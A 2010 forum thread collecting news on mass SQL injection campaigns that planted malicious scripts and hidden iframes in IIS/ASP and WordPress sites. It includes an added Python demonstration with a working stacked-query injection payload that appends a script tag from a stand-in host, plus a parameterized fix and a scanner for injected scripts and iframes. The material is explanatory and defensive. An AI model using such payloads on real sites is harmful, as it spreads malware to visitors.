Thousands of sites infected...

2010-02-23, 17:46

Automated SQL injection attacks...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=223100129
Feb. 22, 2010 - "SQL injections top plenty of lists as the most prevalent means of attacking front-end Web applications and back-end databases to compromise data... analysis of the Web Hacking Incidents Database* (WHID) shows SQL injections as the top attack vector, making up 19 percent of all security breaches examined by WHID. Similarly, in the "Breach Report for 2010" (PDF) released by 7Safe** earlier this month, a whopping 60 percent of all breach incidents examined involved SQL injections... criminals are increasingly using automated SQL injection attacks powered by botnets to hit vulnerable systems... the purpose of those attacks is really to inject JavaScript redirectors into Web pages so that legitimate Web pages end up redirecting their users to exploit toolkits..."
* http://webappsec.pbworks.com/Web-Hacking-Incident-Database

** http://7safe.com/breach_report/Breach_report_2010.pdf
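To make the mechanism in the Dark Reading piece concrete, here is an added example (mine, not code from any of the articles quoted in this thread) of how a single automated SQL injection request turns into a JavaScript redirector in every page a site serves. Everything in it is assumed for illustration: a toy `articles` table in SQLite, a classic string-concatenated lookup, a made-up `example.invalid` script host, and a driver that accepts stacked statements (emulated with `executescript`, because `sqlite3.execute()` refuses them while SQL Server behind classic ASP/ADO did not).

```python
"""Added example: automated SQL injection that appends a <script> tag to
every stored page body, beside the parameterized query that stops it.

All names here are constructed for the example and are not from the page.
"""
import sqlite3

# Constructed script host; the real campaigns used short throwaway domains.
INJECTED_TAG = '<script src="http://example.invalid/u.js"></script>'

# Constructed payload in the style of the mass injections: close the
# quoted lookup value, rewrite every row's body, comment out the rest.
PAYLOAD = "1'; UPDATE articles SET body = body || '" + INJECTED_TAG + "'; --"


def make_db():
    """Two ordinary article rows in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO articles (body) VALUES (?)",
                     [("<p>Hello</p>",), ("<p>World</p>",)])
    conn.commit()
    return conn


def handle_request_vulnerable(conn, raw_id):
    """Classic pattern: the request parameter is pasted into the SQL text.

    executescript emulates a driver that runs stacked statements, which is
    what let one GET request rewrite a whole site's content on SQL Server.
    """
    sql = "SELECT body FROM articles WHERE id = '" + raw_id + "'"
    conn.executescript(sql)
    conn.commit()


def handle_request_safe(conn, raw_id):
    """Hardened: the value is bound as a parameter, never parsed as SQL.

    Returns the body for a matching id, or None when nothing matches
    (the payload string is not a valid id, so it simply finds no row).
    """
    row = conn.execute("SELECT body FROM articles WHERE id = ?",
                       (raw_id,)).fetchone()
    return row[0] if row else None


def visitor_sees(conn, article_id):
    """What a later, innocent visitor gets for a given article."""
    return conn.execute("SELECT body FROM articles WHERE id = ?",
                        (article_id,)).fetchone()[0]


def injected_count(conn):
    """How many stored pages now carry a script tag."""
    return conn.execute(
        "SELECT COUNT(*) FROM articles WHERE body LIKE '%<script%'"
    ).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("safe lookup with payload:", handle_request_safe(db, PAYLOAD))
    print("injected pages before:", injected_count(db))
    handle_request_vulnerable(db, PAYLOAD)
    print("injected pages after:", injected_count(db))
    print("visitor now sees:", visitor_sees(db, 2))
```

The point to take from it: the bot never needs to know the schema of the specific site beyond a column to append to, which is why the same payload lands on thousands of unrelated sites. Binding the parameter removes the attack regardless of how many statements the driver allows.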


2010-03-10, 04:09

WordPress injection attack
- http://securitylabs.websense.com/content/Blogs/3577.aspx
03.09.2010 - "... Websense... has been monitoring the latest WordPress injection attack for over 2 weeks and has found over 250,000 injections occurring in the past half month. Moreover, over 37,000 URLs in the wild are still being injected according to our observations... the daily stats go up and down a few times and always end up higher, so we believe the hackers are still continuing their attack... WordPress is so widely used all over the world that every version of it is studied and exploited by hackers, even the latest version (2.9.2, released on December 18, 2009)... The ultimate purpose of the attack is all about making money, as Sophos has already investigated*... These attacks probably happened due to SQL injection via some known and unknown WordPress vulnerabilities... Injection is not the only way for hackers to utilize those vulnerabilities; compromising a site is also a good option. It has often been reported that compromised Web sites are used for Blackhat SEO to push rogue AVs. Novirusthanks has a great analysis here**, and more investigation indicates that the compromise behind the attack is connected to WordPress vulnerabilities... WordPress users should be very familiar with the injection or compromise attack since it has been used frequently in the past. Although WordPress has 2-3 releases every year and has 3 releases planned this year as usual, it has proved to be not enough: we still can see many victimized sites with the latest 2.9.2 installation..."

(More detail and screenshots available at the Websense URL above.)

* http://www.sophos.com/blogs/sophoslabs/?p=8498

** http://blog.novirusthanks.org/2009/11/more-than-100-websites-compromised-for-blackhat-seo-strategy/


2010-06-09, 23:03

Mass Infection of IIS/ASP Sites
- http://isc.sans.edu/diary.html?storyid=8935
Last Updated: 2010-06-09 19:01:51 UTC - "Sucuri.net has released a report about a large number of sites that have been hacked and contain a malware script. A quick Google today indicates that there are currently 111,000 sites still infected. It appears that this is only impacting websites hosted on Windows servers. The situation is being investigated. For those who are hosting their websites on Windows IIS/ASP you may find more information here:
- http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
June 8, 2010 - "... sites have been hacked in the last day with a malware script pointing to
http ://ww.robint .us/u.js. Not only small sites, but some big ones got hit as well..."

- http://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.html

Update: Paul at Sophos logs has released some additional information regarding this exploit and Infection. Thanks Paul.
- http://www.sophos.com/blogs/sophoslabs/?p=9941

SQL injection attacks...
- http://www.theregister.co.uk/2010/06/09/mass_webpage_attack/
9 June 2010 - "... Robint.us has been disabled, thanks to a sinkholing effort carried out by volunteer security outfit Shadowserver Foundation. The action will allow Shadowserver researchers to get a complete list of compromised sites and to gather additional information about how the attack was carried out..."

Shadowserver Sinkholing domain associated with SQLi attacks on IIS/ASP web servers
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20100609
9 June 2010

- http://blog.scansafe.com/journal/2010/6/8/robintus-a-poster-child-for-repeat-injections.html
June 8, 2010


2010-06-12, 04:13

Adobe 0-day used - mass injections
- http://community.websense.com/blogs/securitylabs/archive/2010/06/11/adobe-0-day-used-in-mass-injections.aspx
11 Jun 2010 05:38 PM - "... we started seeing mass injections... The attack is closely related to the hxxp ://ww.robint .us/[REMOVED].js attack earlier this week... common theme was that all Web sites were running on Microsoft IIS and used ASP.NET. In fact, the majority of sites compromised by the -new- mass injection attack still have the robint.us code present... Adobe released a patch* for this vulnerability yesterday and we advise all users to download it immediately... Once for IE and a second time for all other browsers."

(Screenshots and video available at the Websense URL above.)

Flash v10.1.53.64 update
* http://forums.spybot.info/showpost.php?p=374070&postcount=52

- http://www.theregister.co.uk/2010/06/11/mass_webpage_attack/
11 June 2010 - "... The latest SQL injection attack pulls down a malicious JavaScript from 2677.in, which according to anti-virus firm Symantec*, downloads a serious threat dubbed “HTTP Microsoft IE Generic Heap Spray BO.” 2677.in was still active at time of writing..."
* http://safeweb.norton.com/report/show?name=2677.in

- http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-2677-inyahoo-js.html
June 11, 2010

- http://google.com/safebrowsing/diagnostic?site=2677.in/
"... The last time Google visited this site was on 2010-06-13, and the last time suspicious content was found on this site was on 2010-06-13. Malicious software includes 8 scripting exploit(s), 1 trojan(s), 1 exploit(s)... this site has hosted malicious software over the past 90 days. It infected 185 domain(s)..."

- http://ddanchev.blogspot.com/2010/06/facebook-photo-album-themed-malware.html
June 15, 2010 - "... Where's the mass SQL injection attack connection? Within AS42560*... part of the campaign... Detection rate: - urchin.js - Trojan.JS.Redirector.ca (v); JS:Downloader-LP - Result: 4/41 (9.76%)... AS49087**, Telos-Solutions-AS..."
* http://stopbadware.org/reports/asn/42560
AS 42560 - BA-GLOBALNET-AS GlobalNET Bosnia
** http://stopbadware.org/reports/asn/49087
AS 49087 - TELOS-SOLUTIONS-AS Telos Solutions LTD

- http://blog.webroot.com/2010/06/14/facebook-photo-album-spam-drops-trojans/
June 14, 2010


2010-08-24, 22:23

Mass infection of websites
- http://techblog.avira.com/2010/08/24/mass-infection-of-websites/en/
August 24, 2010 - "Drive-by-downloads that use exploits to infect the visitor of a website are a very popular distribution method for malware authors. In the last days we detected thousands of websites which are infected with a hidden, invisible iframe. Searching for similar iframe infections shows that Google lists about 47,300 hits. The target server and script this iframe points to are currently offline; the injection scripts of the malware authors may be inactive at present. Some of these infected sites had more than one iframe injected into them though. They were infected with three or more scripts which all point to Russian servers. This looks like a mass infection of websites which are created with a certain content management system (CMS). Usually, such mass infections are done with so-called SQL injections through security holes in these CMSes. Website administrators should always take care to have the latest version of their CMS and the needed scripting languages like PHP and Perl installed so that such mass SQL injections don't have a chance. The malware authors didn't take the effort to properly track their infections, as the observation of multiple injections with the same iframe shows..."
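For anyone checking their own site against the two injection shapes reported in this thread (the appended `<script src=...>` tag from the IIS/ASP posts above and the hidden iframe Avira describes, sometimes present several times per page), here is an added detection example. It is my code, not from Avira, Sucuri or any other source quoted here, and it assumes a hypothetical allowlist of script hosts plus a few constructed sample pages; the hosts in them are made up and are not the real campaign domains.

```python
"""Added example: scan stored page content for injected external scripts
and hidden iframes, and tally how often each foreign host appears so that
repeat injections (the same iframe pasted three times) stand out.

Works on any text you can pull out: .php/.asp files, CMS database dumps,
or crawled HTML. Pure standard library; the inputs below are constructed.
"""
import re
from collections import Counter

# Assumed allowlist: hosts this site is expected to load scripts from.
TRUSTED_HOSTS = {"www.example.com", "ajax.googleapis.com"}

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'([a-z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.I)


def host_of(url):
    """Hostname of an absolute or protocol-relative URL, else None."""
    m = re.match(r'^(?:https?:)?//([^/:?#]+)', url, re.I)
    return m.group(1).lower() if m else None


def iframe_attrs(raw):
    """Attribute dict for one <iframe ...> tag body (quoted or bare values)."""
    attrs = {}
    for m in ATTR.finditer(raw):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def is_hidden(attrs):
    """True for display:none / visibility:hidden or a 0x0 / 1x1 frame."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True

    def tiny(v):
        v = v.strip().lower().rstrip("px")
        return v in ("0", "1")

    return tiny(attrs.get("width", "")) and tiny(attrs.get("height", ""))


def scan(html):
    """List of (kind, host) findings for one page."""
    findings = []
    for m in SCRIPT_SRC.finditer(html):
        h = host_of(m.group(1))
        if h and h not in TRUSTED_HOSTS:
            findings.append(("external-script", h))
    for m in IFRAME.finditer(html):
        attrs = iframe_attrs(m.group(1))
        h = host_of(attrs.get("src", ""))
        if h and is_hidden(attrs):
            findings.append(("hidden-iframe", h))
    return findings


def scan_site(pages):
    """pages: {path: html}. Returns (findings per page, host tally).

    The tally counts occurrences, not pages, so a host injected three
    times into one file scores 3; that is the repeat-injection signal.
    """
    report = {path: scan(html) for path, html in pages.items()}
    tally = Counter(host for f in report.values() for _, host in f)
    return report, tally


# Constructed sample pages (hosts are invented, not real campaign domains).
HIDDEN = ('<iframe src="http://injected.invalid/in.cgi?3" width="1" '
          'height="1" style="visibility:hidden"></iframe>')
SAMPLE_PAGES = {
    "index.asp": ('<html><script src="http://www.example.com/site.js"></script>'
                  '<body>Welcome</body></html>'
                  '<script src="http://injected.invalid/u.js"></script>'),
    "about.php": "<html><body>About us</body></html>" + HIDDEN * 3,
    "contact.html": ('<html><body><iframe src="https://www.youtube.com/embed/x" '
                     'width="560" height="315"></iframe></body></html>'),
}

if __name__ == "__main__":
    per_page, hosts = scan_site(SAMPLE_PAGES)
    for path, found in per_page.items():
        print(path, found)
    print("suspect hosts:", dict(hosts))
```

Run it over a directory of files or a database export and feed the tally to whatever you use for blocking; a host that appears on every page, or several times on one page, is almost certainly not something a developer added by hand. It will not catch obfuscated inline scripts, so treat it as a first pass after a compromise, not as proof of a clean site.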


2010-11-22, 20:47

Websense in error blaming WordPress ...
- http://www.whitefirdesign.com/news/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/
November 15, 2010 - "In Websense's 2010 Threat Report they listed WordPress Attacks as one of the significant events of the year**... The hacks they refer to were actually hacks that targeted hosting providers that would allow malicious code to be added to websites hosted with the provider whether they were running WordPress, other software, or no software at all. In most of the hacks the malicious code was placed in all files that had a .php extension. WordPress, by the nature of being the most popular web software, was the most often affected, but all web software that has files with a .php extension was also affected. In other cases the hacks targeted database fields specific to WordPress, but they could have affected any other software that utilized a database if the hacker had chosen to target them instead of WordPress. Websense is not alone in making these false claims; other supposed security experts also made similar claims and some hosting providers have attempted to lay blame on WordPress. Network Solutions was the only one to later apologize for blaming WordPress...*"
* http://blog.networksolutions.com/2010/wordpress-is-not-the-issue/

** http://www.websense.com/content/threat-report-2010-wordpress.aspx